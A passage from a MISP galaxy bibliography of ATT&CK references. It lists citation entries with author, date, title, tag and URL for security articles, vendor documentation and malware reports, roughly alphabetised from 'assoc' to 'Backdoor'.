Plett, C. et al.. (2017, October 15). assoc. Retrieved August 7, 2018.

The tag is: misp-galaxy:references="Microsoft Assoc Oct 2017"

Table 12702. Table References

Links

https://docs.microsoft.com/windows-server/administration/windows-commands/assoc

Rhino Security Labs Enumerating AWS Roles

Spencer Gietzen. (2018, August 8). Assume the Worst: Enumerating AWS Roles through ‘AssumeRole’. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="Rhino Security Labs Enumerating AWS Roles"

Table 12703. Table References

Links

https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration

Cybereason Astaroth Feb 2019

Salem, E. (2019, February 13). ASTAROTH MALWARE USES LEGITIMATE OS AND ANTIVIRUS PROCESSES TO STEAL PASSWORDS AND PERSONAL DATA. Retrieved April 17, 2019.

The tag is: misp-galaxy:references="Cybereason Astaroth Feb 2019"

Table 12704. Table References

Links

https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research

spamhaus-malvertising

Miller, Sarah. (2023, February 2). A surge of malvertising across Google Ads is distributing dangerous malware. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="spamhaus-malvertising"

Table 12705. Table References

Links

https://www.spamhaus.com/resource-center/a-surge-of-malvertising-across-google-ads-is-distributing-dangerous-malware/

Microsoft APC

Microsoft. (n.d.). Asynchronous Procedure Calls. Retrieved December 8, 2017.

The tag is: misp-galaxy:references="Microsoft APC"

Table 12706. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ms681951.aspx

TechNet At

Microsoft. (n.d.). At. Retrieved April 28, 2016.

The tag is: misp-galaxy:references="TechNet At"

Table 12707. Table References

Links

https://technet.microsoft.com/en-us/library/bb490866.aspx

Die.net Linux at Man Page

Thomas Koenig. (n.d.). at(1) - Linux man page. Retrieved December 19, 2017.

The tag is: misp-galaxy:references="Die.net Linux at Man Page"

Table 12708. Table References

Links

https://linux.die.net/man/1/at

Linux at

IEEE/The Open Group. (2017). at(1p) — Linux manual page. Retrieved February 25, 2022.

The tag is: misp-galaxy:references="Linux at"

Table 12709. Table References

Links

https://man7.org/linux/man-pages/man1/at.1p.html

PWC Pirpi Scanbox

Lancaster, T. (2015, July 25). A tale of Pirpi, Scanbox & CVE-2015-3113. Retrieved March 30, 2016.

The tag is: misp-galaxy:references="PWC Pirpi Scanbox"

Table 12710. Table References

Links

http://pwc.blogs.com/cyber_security_updates/2015/07/pirpi-scanbox.html

Atbroker.exe - LOLBAS Project

LOLBAS. (2018, May 25). Atbroker.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Atbroker.exe - LOLBAS Project"

Table 12711. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Atbroker/

ESET Attor Oct 2019

Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020.

The tag is: misp-galaxy:references="ESET Attor Oct 2019"

Table 12712. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf

LogRhythm WannaCry

Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="LogRhythm WannaCry"

Table 12713. Table References

Links

https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/

Malwarebytes Dyreza November 2015

hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020.

The tag is: misp-galaxy:references="Malwarebytes Dyreza November 2015"

Table 12714. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/

At.exe - LOLBAS Project

LOLBAS. (2019, September 20). At.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="At.exe - LOLBAS Project"

Table 12715. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/At/

ENSIL AtomBombing Oct 2016

Liberman, T. (2016, October 27). ATOMBOMBING: BRAND NEW CODE INJECTION FOR WINDOWS. Retrieved December 8, 2017.

The tag is: misp-galaxy:references="ENSIL AtomBombing Oct 2016"

Table 12716. Table References

Links

https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows

FireEye TRITON 2018

Miller, S. Reese, E. (2018, June 7). A Totally Tubular Treatise on TRITON and TriStation. Retrieved January 6, 2021.

The tag is: misp-galaxy:references="FireEye TRITON 2018"

Table 12717. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-TRITON-and-tristation.html

The DFIR Report Truebot June 12 2023

The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out. Retrieved June 15, 2023.

The tag is: misp-galaxy:references="The DFIR Report Truebot June 12 2023"

Table 12718. Table References

Links

https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/

att_def_ps_logging

Hao, M. (2019, February 27). Attack and Defense Around PowerShell Event Logging. Retrieved November 24, 2021.

The tag is: misp-galaxy:references="att_def_ps_logging"

Table 12719. Table References

Links

https://nsfocusglobal.com/attack-and-defense-around-powershell-event-logging/

Intezer TeamTNT September 2020

Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="Intezer TeamTNT September 2020"

Table 12720. Table References

Links

https://www.intezer.com/blog/cloud-security/attackers-abusing-legitimate-cloud-monitoring-tools-to-conduct-cyber-attacks/

Metcalf 2015

Metcalf, S. (2015, January 19). Attackers Can Now Use Mimikatz to Implant Skeleton Key on Domain Controllers & BackDoor Your Active Directory Forest. Retrieved February 3, 2015.

The tag is: misp-galaxy:references="Metcalf 2015"

Table 12721. Table References

Links

http://adsecurity.org/?p=1275

Cisco Blog Legacy Device Attacks

Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Cisco Blog Legacy Device Attacks"

Table 12722. Table References

Links

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

FireEye TRITON 2017

Johnson, B, et. al. (2017, December 14). Attackers Deploy New ICS Attack Framework "TRITON" and Cause Operational Disruption to Critical Infrastructure. Retrieved January 6, 2021.

The tag is: misp-galaxy:references="FireEye TRITON 2017"

Table 12723. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

GitHub Cloud Service Credentials

Runa A. Sandvik. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved August 9, 2022.

The tag is: misp-galaxy:references="GitHub Cloud Service Credentials"

Table 12724. Table References

Links

https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/

Forbes GitHub Creds

Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Forbes GitHub Creds"

Table 12725. Table References

Links

https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196

Unit 42 Unsecured Docker Daemons

Chen, J.. (2020, January 29). Attacker’s Tactics and Techniques in Unsecured Docker Daemons Revealed. Retrieved March 31, 2021.

The tag is: misp-galaxy:references="Unit 42 Unsecured Docker Daemons"

Table 12726. Table References

Links

https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/

Black Hills Attacking Exchange MailSniper, 2016

Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper. Retrieved October 6, 2019.

The tag is: misp-galaxy:references="Black Hills Attacking Exchange MailSniper, 2016"

Table 12727. Table References

Links

https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/

SANS Attacking Kerberos Nov 2014

Medin, T. (2014, November). Attacking Kerberos - Kicking the Guard Dog of Hades. Retrieved March 22, 2018.

The tag is: misp-galaxy:references="SANS Attacking Kerberos Nov 2014"

Table 12728. Table References

Links

https://redsiege.com/kerberoast-slides

NetSPI SQL Server CLR

Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies. Retrieved July 8, 2019.

The tag is: misp-galaxy:references="NetSPI SQL Server CLR"

Table 12729. Table References

Links

https://blog.netspi.com/attacking-sql-server-clr-assemblies/

Mandiant FIN5 GrrCON Oct 2016

Bromiley, M. and Lewis, P. (2016, October 7). Attacking the Hospitality and Gaming Industries: Tracking an Attacker Around the World in 7 Years. Retrieved October 6, 2017.

The tag is: misp-galaxy:references="Mandiant FIN5 GrrCON Oct 2016"

Table 12730. Table References

Links

https://www.youtube.com/watch?v=fevGZs0EQu8

Attacking VNC Servers PentestLab

Administrator, Penetration Testing Lab. (2012, October 30). Attacking VNC Servers. Retrieved October 6, 2021.

The tag is: misp-galaxy:references="Attacking VNC Servers PentestLab"

Table 12731. Table References

Links

https://pentestlab.blog/2012/10/30/attacking-vnc-servers/

Talos Template Injection July 2017

Baird, S. et al.. (2017, July 7). Attack on Critical Infrastructure Leverages Template Injection. Retrieved July 21, 2018.

The tag is: misp-galaxy:references="Talos Template Injection July 2017"

Table 12732. Table References

Links

https://blog.talosintelligence.com/2017/07/template-injection.html

Lotus Blossom Dec 2015

Falcone, R. and Miller-Osborn, J.. (2015, December 18). Attack on French Diplomat Linked to Operation Lotus Blossom. Retrieved February 15, 2016.

The tag is: misp-galaxy:references="Lotus Blossom Dec 2015"

Table 12733. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-linked-to-operation-lotus-blossom/

Symantec Attacks Against Government Sector

Symantec. (2021, June 10). Attacks Against the Government Sector. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Symantec Attacks Against Government Sector"

Table 12734. Table References

Links

https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf

CERT-FR PYSA April 2020

CERT-FR. (2020, April 1). ATTACKS INVOLVING THE MESPINOZA/PYSA RANSOMWARE. Retrieved March 1, 2021.

The tag is: misp-galaxy:references="CERT-FR PYSA April 2020"

Table 12736. Table References

Links

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-003.pdf

InsiderThreat NTFS EA Oct 2017

Sander, J. (2017, October 12). Attack Step 3: Persistence with NTFS Extended Attributes – File System Attacks. Retrieved March 21, 2018.

The tag is: misp-galaxy:references="InsiderThreat NTFS EA Oct 2017"

Table 12737. Table References

Links

https://blog.stealthbits.com/attack-step-3-persistence-ntfs-extended-attributes-file-system-attacks

Microsoft ASR Obfuscation

Microsoft. (2023, February 22). Attack surface reduction (ASR) rules reference: Block execution of potentially obfuscated scripts. Retrieved March 17, 2023.

The tag is: misp-galaxy:references="Microsoft ASR Obfuscation"

Table 12738. Table References

Links

https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#block-execution-of-potentially-obfuscated-scripts

TrendMicro Msiexec Feb 2018

Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019.

The tag is: misp-galaxy:references="TrendMicro Msiexec Feb 2018"

Table 12739. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/

GitHub ATTACK Empire

Stepanic, D. (2018, September 2). attck_empire: Generate ATT&CK Navigator layer file from PowerShell Empire agent logs. Retrieved March 11, 2019.

The tag is: misp-galaxy:references="GitHub ATTACK Empire"

Table 12740. Table References

Links

https://github.com/dstepanic/attck_empire

lambert systemd 2022

Tony Lambert. (2022, November 13). ATT&CK T1501: Understanding systemd service persistence. Retrieved March 20, 2023.

The tag is: misp-galaxy:references="lambert systemd 2022"

Table 12741. Table References

Links

https://redcanary.com/blog/attck-t1501-understanding-systemd-service-persistence/

TechNet Credential Theft

Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016.

The tag is: misp-galaxy:references="TechNet Credential Theft"

Table 12742. Table References

Links

https://technet.microsoft.com/en-us/library/dn535501.aspx

Audit OSX

Gagliardi, R. (n.d.). Audit in a OS X System. Retrieved September 23, 2021.

The tag is: misp-galaxy:references="Audit OSX"

Table 12743. Table References

Links

https://www.scip.ch/en/?labs.20150108

Microsoft Audit Logon Events

Microsoft. (2021, September 6). Audit logon events. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Microsoft Audit Logon Events"

Table 12744. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events

Cloud Audit Logs

Google. (n.d.). Audit Logs. Retrieved June 1, 2020.

The tag is: misp-galaxy:references="Cloud Audit Logs"

Table 12745. Table References

Links

https://cloud.google.com/logging/docs/audit#admin-activity

Microsoft Scheduled Task Events Win10

Microsoft. (2017, May 28). Audit Other Object Access Events. Retrieved June 27, 2019.

The tag is: misp-galaxy:references="Microsoft Scheduled Task Events Win10"

Table 12746. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events

auditpol

Jason Gerend, et al. (2017, October 16). auditpol. Retrieved September 1, 2021.

The tag is: misp-galaxy:references="auditpol"

Table 12747. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol

auditpol.exe_STRONTIC

STRONTIC. (n.d.). auditpol.exe. Retrieved September 9, 2021.

The tag is: misp-galaxy:references="auditpol.exe_STRONTIC"

Table 12748. Table References

Links

https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html

Audit_Policy_Microsoft

Daniel Simpson. (2017, April 19). Audit Policy. Retrieved September 13, 2021.

The tag is: misp-galaxy:references="Audit_Policy_Microsoft"

Table 12749. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policy

TechNet Audit Policy

Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.

The tag is: misp-galaxy:references="TechNet Audit Policy"

Table 12750. Table References

Links

https://technet.microsoft.com/en-us/library/dn487457.aspx

Microsoft Audit Registry July 2012

Microsoft. (2012, July 2). Audit Registry. Retrieved January 31, 2018.

The tag is: misp-galaxy:references="Microsoft Audit Registry July 2012"

Table 12751. Table References

Links

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10)

Security Affairs Elderwood Sept 2012

Paganini, P. (2012, September 9). Elderwood project, who is behind Op. Aurora and ongoing attacks?. Retrieved February 13, 2018.

The tag is: misp-galaxy:references="Security Affairs Elderwood Sept 2012"

Table 12752. Table References

Links

http://securityaffairs.co/wordpress/8528/hacking/elderwood-project-who-is-behind-op-aurora-and-ongoing-attacks.html

NIST Authentication

NIST. (n.d.). Authentication. Retrieved January 30, 2020.

The tag is: misp-galaxy:references="NIST Authentication"

Table 12753. Table References

Links

https://csrc.nist.gov/glossary/term/authentication

MSDN Authentication Packages

Microsoft. (n.d.). Authentication Packages. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="MSDN Authentication Packages"

Table 12754. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx

Microsoft Authenticode

Microsoft. (n.d.). Authenticode. Retrieved January 31, 2018.

The tag is: misp-galaxy:references="Microsoft Authenticode"

Table 12755. Table References

Links

https://msdn.microsoft.com/library/ms537359.aspx

K8s Authorization Overview

Kubernetes. (n.d.). Authorization Overview. Retrieved June 24, 2021.

The tag is: misp-galaxy:references="K8s Authorization Overview"

Table 12756. Table References

Links

https://kubernetes.io/docs/reference/access-authn-authz/authorization/

SSH Authorized Keys

ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June 24, 2020.

The tag is: misp-galaxy:references="SSH Authorized Keys"

Table 12757. Table References

Links

https://www.ssh.com/ssh/authorized_keys/

Trend Micro njRAT 2018

Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.

The tag is: misp-galaxy:references="Trend Micro njRAT 2018"

Table 12758. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/

Re-Open windows on Mac

Apple. (2016, December 6). Automatically re-open windows, apps, and documents on your Mac. Retrieved July 11, 2017.

The tag is: misp-galaxy:references="Re-Open windows on Mac"

Table 12759. Table References

Links

https://support.apple.com/en-us/HT204005

TechNet Autoruns

Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.

The tag is: misp-galaxy:references="TechNet Autoruns"

Table 12760. Table References

Links

https://technet.microsoft.com/en-us/sysinternals/bb963902

Autoruns for Windows

Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020.

The tag is: misp-galaxy:references="Autoruns for Windows"

Table 12761. Table References

Links

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

Hornet Security Avaddon June 2020

Security Lab. (2020, June 5). Avaddon: From seeking affiliates to in-the-wild in 2 days. Retrieved August 19, 2021.

The tag is: misp-galaxy:references="Hornet Security Avaddon June 2020"

Table 12762. Table References

Links

https://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wild-in-2-days/

Arxiv Avaddon Feb 2021

Yuste, J. Pastrana, S. (2021, February 9). Avaddon ransomware: an in-depth analysis and decryption of infected systems. Retrieved August 19, 2021.

The tag is: misp-galaxy:references="Arxiv Avaddon Feb 2021"

Table 12763. Table References

Links

https://arxiv.org/pdf/2102.04796.pdf

CISA Phishing

CISA. (2021, February 1). Avoiding Social Engineering and Phishing Attacks. Retrieved September 8, 2023.

The tag is: misp-galaxy:references="CISA Phishing"

Table 12764. Table References

Links

https://www.cisa.gov/news-events/news/avoiding-social-engineering-and-phishing-attacks

Malwarebytes AvosLocker Jul 2021

Hasherezade. (2021, July 23). AvosLocker enters the ransomware scene, asks for partners. Retrieved January 11, 2023.

The tag is: misp-galaxy:references="Malwarebytes AvosLocker Jul 2021"

Table 12765. Table References

Links

https://www.malwarebytes.com/blog/threat-intelligence/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners

avoslocker_ransomware

Lakshmanan, R. (2022, May 2). AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection. Retrieved May 17, 2022.

The tag is: misp-galaxy:references="avoslocker_ransomware"

Table 12766. Table References

Links

https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html

Cisco Talos Avos Jun 2022

Venere, G. Neal, C. (2022, June 21). Avos ransomware group expands with new attack arsenal. Retrieved January 11, 2023.

The tag is: misp-galaxy:references="Cisco Talos Avos Jun 2022"

Table 12767. Table References

Links

https://blog.talosintelligence.com/avoslocker-new-arsenal/

Awesome Executable Packing

Alexandre D’Hondt. (n.d.). Awesome Executable Packing. Retrieved March 11, 2022.

The tag is: misp-galaxy:references="Awesome Executable Packing"

Table 12768. Table References

Links

https://github.com/dhondta/awesome-executable-packing

ESET Kobalos Jan 2021

M.Leveille, M., Sanmillan, I. (2021, January). A WILD KOBALOS APPEARS Tricksy Linux malware goes after HPCs. Retrieved August 24, 2021.

The tag is: misp-galaxy:references="ESET Kobalos Jan 2021"

Table 12769. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf

AWS Root User

Amazon. (n.d.). AWS Account Root User. Retrieved April 5, 2021.

The tag is: misp-galaxy:references="AWS Root User"

Table 12770. Table References

Links

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html

GitHub AWS-ADFS-Credential-Generator

Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator. Retrieved December 16, 2020.

The tag is: misp-galaxy:references="GitHub AWS-ADFS-Credential-Generator"

Table 12771. Table References

Links

https://github.com/damianh/aws-adfs-credential-generator

AWS GetPasswordPolicy

Amazon Web Services. (n.d.). AWS API GetAccountPasswordPolicy. Retrieved June 8, 2021.

The tag is: misp-galaxy:references="AWS GetPasswordPolicy"

Table 12772. Table References

Links

https://docs.aws.amazon.com/IAM/latest/APIReference/API_GetAccountPasswordPolicy.html

AWS Console Sign-in Events

Amazon. (n.d.). AWS Console Sign-in Events. Retrieved October 23, 2019.

The tag is: misp-galaxy:references="AWS Console Sign-in Events"

Table 12773. Table References

Links

https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-aws-console-sign-in-events.html

AWS Describe DB Instances

Amazon Web Services. (n.d.). Retrieved May 28, 2021.

The tag is: misp-galaxy:references="AWS Describe DB Instances"

Table 12774. Table References

Links

https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html

AWS Get Bucket ACL

Amazon Web Services. (n.d.). Retrieved May 28, 2021.

The tag is: misp-galaxy:references="AWS Get Bucket ACL"

Table 12775. Table References

Links

https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketAcl.html

AWS Get Public Access Block

Amazon Web Services. (n.d.). Retrieved May 28, 2021.

The tag is: misp-galaxy:references="AWS Get Public Access Block"

Table 12776. Table References

Links

https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html

AWS Head Bucket

Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February 14, 2022.

The tag is: misp-galaxy:references="AWS Head Bucket"

Table 12777. Table References

Links

https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html

Rhino Security Labs AWS Privilege Escalation

Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation – Methods and Mitigation. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Rhino Security Labs AWS Privilege Escalation"

Table 12778. Table References

Links

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

AWS Lambda Redirector

Adam Chester. (2020, February 25). AWS Lambda Redirector. Retrieved July 8, 2022.

The tag is: misp-galaxy:references="AWS Lambda Redirector"

Table 12779. Table References

Links

https://blog.xpnsec.com/aws-lambda-redirector/

Rhino Security Labs AWS S3 Ransomware

Spencer Gietzen. (n.d.). AWS Simple Storage Service S3 Ransomware Part 2: Prevention and Defense. Retrieved March 21, 2023.

The tag is: misp-galaxy:references="Rhino Security Labs AWS S3 Ransomware"

Table 12780. Table References

Links

https://rhinosecuritylabs.com/aws/s3-ransomware-part-2-prevention-and-defense/

AWS Systems Manager Run Command

AWS. (n.d.). AWS Systems Manager Run Command. Retrieved March 13, 2023.

The tag is: misp-galaxy:references="AWS Systems Manager Run Command"

Table 12781. Table References

Links

https://docs.aws.amazon.com/systems-manager/latest/userguide/run-command.html

Pylos Xenotime 2019

Slowik, J.. (2019, April 12). A XENOTIME to Remember: Veles in the Wild. Retrieved April 16, 2019.

The tag is: misp-galaxy:references="Pylos Xenotime 2019"

Table 12782. Table References

Links

https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/

objective-see ay mami 2018

Patrick Wardle. (2018, January 11). Ay MaMi. Retrieved March 19, 2018.

The tag is: misp-galaxy:references="objective-see ay mami 2018"

Table 12783. Table References

Links

https://objective-see.com/blog/blog_0x26.html

Microsoft AZ CLI

Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.

The tag is: misp-galaxy:references="Microsoft AZ CLI"

Table 12784. Table References

Links

https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest

Intezer Russian APT Dec 2020

Kennedy, J. (2020, December 9). A Zebra in Gopher’s Clothing: Russian APT Uses COVID-19 Lures to Deliver Zebrocy. Retrieved February 22, 2021.

The tag is: misp-galaxy:references="Intezer Russian APT Dec 2020"

Table 12785. Table References

Links

https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/

az monitor diagnostic-settings

Microsoft. (n.d.). az monitor diagnostic-settings. Retrieved October 16, 2020.

The tag is: misp-galaxy:references="az monitor diagnostic-settings"

Table 12786. Table References

Links

https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest#az_monitor_diagnostic_settings_delete

Microsoft Azure AD Security Operations for Devices

Microsoft. (2020, September 16). Azure Active Directory security operations for devices. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="Microsoft Azure AD Security Operations for Devices"

Table 12787. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices

Microsoft Azure Active Directory security operations guide

Microsoft . (2022, September 16). Azure Active Directory security operations guide. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="Microsoft Azure Active Directory security operations guide"

Table 12788. Table References

Links

https://learn.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-introduction

Azure AD Connect for Read Teamers

Adam Chester. (2019, February 18). Azure AD Connect for Red Teamers. Retrieved September 28, 2022.

The tag is: misp-galaxy:references="Azure AD Connect for Read Teamers"

Table 12789. Table References

Links

https://blog.xpnsec.com/azuread-connect-for-redteam/

Microsoft - Azure PowerShell

Microsoft. (2014, December 12). Azure/azure-powershell. Retrieved March 24, 2023.

The tag is: misp-galaxy:references="Microsoft - Azure PowerShell"

Table 12790. Table References

Links

https://github.com/Azure/azure-powershell

Azure Blob Storage

Microsoft. (n.d.). Azure Blob Storage. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Azure Blob Storage"

Table 12791. Table References

Links

https://azure.microsoft.com/en-us/services/storage/blobs/

Microsoft Azure Instance Metadata 2021

Microsoft. (2021, February 21). Azure Instance Metadata Service (Windows). Retrieved April 2, 2021.

The tag is: misp-galaxy:references="Microsoft Azure Instance Metadata 2021"

Table 12792. Table References

Links

https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows

Microsoft Azure Policy

Microsoft. (2023, August 30). Azure Policy built-in policy definitions. Retrieved September 5, 2023.

The tag is: misp-galaxy:references="Microsoft Azure Policy"

Table 12793. Table References

Links

https://learn.microsoft.com/en-us/azure/governance/policy/samples/built-in-policies#compute

SpecterOps Azure Privilege Escalation

Andy Robbins. (2021, October 12). Azure Privilege Escalation via Service Principal Abuse. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="SpecterOps Azure Privilege Escalation"

Table 12794. Table References

Links

https://posts.specterops.io/azure-privilege-escalation-via-service-principal-abuse-210ae2be2a5

Azure Products

Microsoft. (n.d.). Azure products. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Azure Products"

Table 12795. Table References

Links

https://azure.microsoft.com/en-us/services/

Azure - Resource Manager API

Microsoft. (2019, May 20). Azure Resource Manager. Retrieved June 17, 2020.

The tag is: misp-galaxy:references="Azure - Resource Manager API"

Table 12796. Table References

Links

https://docs.microsoft.com/en-us/rest/api/resources/

Mandiant Azure Run Command 2021

Adrien Bataille, Anders Vejlby, Jared Scott Wilson, and Nader Zaveri. (2021, December 14). Azure Run Command for Dummies. Retrieved March 13, 2023.

The tag is: misp-galaxy:references="Mandiant Azure Run Command 2021"

Table 12797. Table References

Links

https://www.mandiant.com/resources/blog/azure-run-command-dummies

Microsoft Azure security baseline for Azure Active Directory

Microsoft. (2022, November 14). Azure security baseline for Azure Active Directory. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="Microsoft Azure security baseline for Azure Active Directory"

Table 12798. Table References

Links

https://learn.microsoft.com/en-us/security/benchmark/azure/baselines/aad-security-baseline

Microsoft - Azure Sentinel ADFSDomainTrustMods

Microsoft. (2020, December). Azure Sentinel Detections. Retrieved December 30, 2020.

The tag is: misp-galaxy:references="Microsoft - Azure Sentinel ADFSDomainTrustMods"

Table 12799. Table References

Links

https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml

Azure Serial Console

Microsoft. (2022, October 17). Azure Serial Console. Retrieved June 2, 2023.

The tag is: misp-galaxy:references="Azure Serial Console"

Table 12800. Table References

Links

https://learn.microsoft.com/en-us/troubleshoot/azure/virtual-machines/serial-console-overview

Microsoft Azure Storage Security, 2019

Amlekar, M., Brooks, C., Claman, L., et. al.. (2019, March 20). Azure Storage security guide. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="Microsoft Azure Storage Security, 2019"

Table 12801. Table References

Links

https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide

Azure - Stormspotter

Microsoft. (2020). Azure Stormspotter GitHub. Retrieved June 17, 2020.

The tag is: misp-galaxy:references="Azure - Stormspotter"

Table 12802. Table References

Links

https://github.com/Azure/Stormspotter

Medium Babuk February 2021

Sebdraven. (2021, February 8). Babuk is distributed packed. Retrieved August 11, 2021.

The tag is: misp-galaxy:references="Medium Babuk February 2021"

Table 12803. Table References

Links

https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62

Sogeti CERT ESEC Babuk March 2021

Sogeti. (2021, March). Babuk Ransomware. Retrieved August 11, 2021.

The tag is: misp-galaxy:references="Sogeti CERT ESEC Babuk March 2021"

Table 12804. Table References

Links

https://www.sogeti.com/globalassets/reports/cybersecchronicles-_babuk.pdf

Unit42 BabyShark Apr 2019

Lim, M.. (2019, April 26). BabyShark Malware Part Two – Attacks Continue Using KimJongRAT and PCRat . Retrieved October 7, 2019.

The tag is: misp-galaxy:references="Unit42 BabyShark Apr 2019"

Table 12805. Table References

Links

https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/

Symantec Briba May 2012

Ladley, F. (2012, May 15). Backdoor.Briba. Retrieved February 21, 2018.

The tag is: misp-galaxy:references="Symantec Briba May 2012"

Table 12806. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-2843-99

TrendMicro Squiblydoo Aug 2017

Bermejo, L., Giagone, R., Wu, R., and Yarochkin, F. (2017, August 7). Backdoor-carrying Emails Set Sights on Russian-speaking Businesses. Retrieved March 7, 2019.

